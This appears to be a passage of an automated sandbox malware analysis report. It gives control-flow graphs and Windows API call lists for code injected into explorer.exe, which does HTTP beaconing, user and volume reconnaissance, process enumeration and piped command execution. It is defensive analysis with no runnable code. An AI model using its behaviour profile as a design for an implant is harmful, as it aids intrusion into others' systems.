                                                                                                                                                                                                                            control_flow_graph 107 89d5160-89d51c7 call 89db388 call 89db4cc 112 89d51c9-89d51d6 107->112 113 89d51d8-89d51e0 107->113 114 89d51e5-89d520d call 89dbe64 112->114 113->114 117 89d520f-89d5226 call 89db4cc 114->117 118 89d5265-89d5275 114->118 126 89d5228-89d5235 117->126 127 89d5237-89d523f 117->127 120 89d5284-89d528c 118->120 121 89d5277-89d5280 118->121 123 89d5315-89d532c call 89db4cc 120->123 124 89d5292-89d52a9 call 89db4cc 120->124 121->120 134 89d532e-89d533e 123->134 135 89d5340-89d5348 123->135 132 89d52ab-89d52b8 124->132 133 89d52ba-89d52c2 124->133 130 89d5244-89d525b call 89dbe64 126->130 127->130 130->118 141 89d5260 call 89dbe64 130->141 137 89d52c7-89d5310 HttpOpenRequestA 132->137 133->137 138 89d5350-89d5397 HttpOpenRequestA 134->138 135->138 140 89d539c-89d53a2 137->140 138->140 142 89d53a9-89d53b1 140->142 143 89d53a4 140->143 141->118 144 89d53d6-89d53de 142->144 145 89d53b3-89d53d0 InternetSetOptionA 142->145 146 89d5467-89d546d 143->146 147 89d5424-89d543f HttpSendRequestA 144->147 148 89d53e0-89d5422 call 89dc0fc * 2 HttpSendRequestA 144->148 145->144 149 89d546f-89d5474 call 89d82b4 146->149 150 89d5479 146->150 152 89d5443-89d5448 147->152 148->152 149->150 154 89d547b-89d5482 150->154 156 89d544c-89d545b call 89d82b4 152->156 157 89d544a 152->157 156->146 156->154 157->146
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET ref: 089D5305
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET ref: 089D5391
                                                                                                                                                                                                                            • InternetSetOptionA.WININET ref: 089D53D0
                                                                                                                                                                                                                            • HttpSendRequestA.WININET ref: 089D5418
                                                                                                                                                                                                                            • HttpSendRequestA.WININET ref: 089D5439
                                                                                                                                                                                                                              • Part of subcall function 089D82B4: NtFreeVirtualMemory.NTDLL ref: 089D82E5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                                                                                            • String ID:

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 174 89d8d3c-89d8d6c call 89db470 GetUserNameA 177 89d8d6e-89d8d81 wsprintfA 174->177 178 89d8d87-89d8d95 174->178 177->178
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameUserwsprintf
                                                                                                                                                                                                                            • String ID: tina

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 211 89d8c30-89d8c7b call 89db470 * 2 FindFirstVolumeW 216 89d8c7d-89d8c7f 211->216 217 89d8c81-89d8cd8 GetVolumeInformationW FindVolumeClose 211->217 218 89d8ce5-89d8cec 216->218 219 89d8cda-89d8ce1 217->219 220 89d8ce3 217->220 219->218 220->218
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstVolumeW.KERNEL32 ref: 089D8C6A
                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 089D8CBE
                                                                                                                                                                                                                            • FindVolumeClose.KERNEL32 ref: 089D8CCD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                                                                                            • String ID:

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 225 89d8a58-89d8a70 226 89d8a79-89d8acc 225->226 227 89d8a72-89d8a74 225->227 229 89d8ad8-89d8ae4 226->229 228 89d8bd4-89d8bd8 227->228 230 89d8aea-89d8b41 call 89dc0fc call 89d7430 229->230 231 89d8bd2 229->231 236 89d8bcd 230->236 237 89d8b47-89d8b4d 230->237 231->228 236->229 237->236 239 89d8b4f-89d8b57 237->239 239->236 240 89d8b59-89d8b61 239->240 241 89d8b75-89d8bcb 240->241 242 89d8b63-89d8b73 GetProcAddress GetProcAddressForCaller 240->242 241->228 242->241
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID:

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 255 89d545d-89d5461 256 89d5265-89d5275 255->256 257 89d5467-89d546d 255->257 260 89d5284-89d528c 256->260 261 89d5277-89d5280 256->261 258 89d546f-89d5474 call 89d82b4 257->258 259 89d5479 257->259 258->259 263 89d547b-89d5482 259->263 264 89d5315-89d532c call 89db4cc 260->264 265 89d5292-89d52a9 call 89db4cc 260->265 261->260 272 89d532e-89d533e 264->272 273 89d5340-89d5348 264->273 270 89d52ab-89d52b8 265->270 271 89d52ba-89d52c2 265->271 274 89d52c7-89d5310 HttpOpenRequestA 270->274 271->274 275 89d5350-89d5397 HttpOpenRequestA 272->275 273->275 276 89d539c-89d53a2 274->276 275->276 277 89d53a9-89d53b1 276->277 278 89d53a4 276->278 279 89d53d6-89d53de 277->279 280 89d53b3-89d53d0 InternetSetOptionA 277->280 278->257 281 89d5424-89d543f HttpSendRequestA 279->281 282 89d53e0-89d5422 call 89dc0fc * 2 HttpSendRequestA 279->282 280->279 284 89d5443-89d5448 281->284 282->284 286 89d544c-89d545b call 89d82b4 284->286 287 89d544a 284->287 286->257 286->263 287->257
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                                                                                            • String ID:

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 292 89d6c6c-89d6ca1 CreateThread 293 89d6caa 292->293 294 89d6ca3-89d6ca8 292->294 295 89d6cac-89d6cb0 293->295 294->295
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID:
APIs
• CreatePipe.KERNEL32 ref: 089D2233
• SetHandleInformation.KERNEL32 ref: 089D224D
• CreatePipe.KERNEL32 ref: 089D226E
• SetHandleInformation.KERNEL32 ref: 089D2288
• CreatePipe.KERNEL32 ref: 089D22A9
• SetHandleInformation.KERNEL32 ref: 089D22C3
• CreateProcessW.KERNEL32 ref: 089D2385
  • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
• PeekNamedPipe.KERNEL32 ref: 089D2434
• ReadFile.KERNEL32 ref: 089D2490
• PeekNamedPipe.KERNEL32 ref: 089D24E4
• ReadFile.KERNEL32 ref: 089D2540
• GetExitCodeProcess.KERNEL32 ref: 089D2579
• TerminateProcess.KERNEL32 ref: 089D25AA
• CloseHandle.KERNEL32 ref: 089D25B8
  • Part of subcall function 089DC704: NtDelayExecution.NTDLL ref: 089DC726
• CloseHandle.KERNEL32 ref: 089D25C6
• CloseHandle.KERNEL32 ref: 089D25D4
• CloseHandle.KERNEL32 ref: 089D25E2
  • Part of subcall function 089D82B4: NtFreeVirtualMemory.NTDLL ref: 089D82E5
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
• String ID: h
• API String ID: 30365702-2439710439
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: CreateFileInitStringUnicode
• String ID: 0$@
• API String ID: 2498367268-1545510068
APIs
  • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
• FindFirstFileA.KERNEL32 ref: 089D2BE7
• wsprintfA.USER32 ref: 089D2CAD
• FindNextFileA.KERNEL32 ref: 089D2CDA
• FindClose.KERNEL32 ref: 089D2CED
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
• String ID:
• API String ID: 65906682-0
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: Internet$CloseHandle$ConnectHttpOpenRequest
• String ID: GET
• API String ID: 830097650-1805413626
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
• String ID:
• API String ID: 3605396869-0
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
• String ID: @
• API String ID: 1610889594-2766056989
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
• String ID: @
• API String ID: 1610889594-2766056989
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 4137211488-0
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: Internet$CloseHandle$Open
• String ID:
• API String ID: 2762225225-0
APIs
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: CloseHandlewsprintf$CreateProcess
• String ID:
• API String ID: 2803068115-0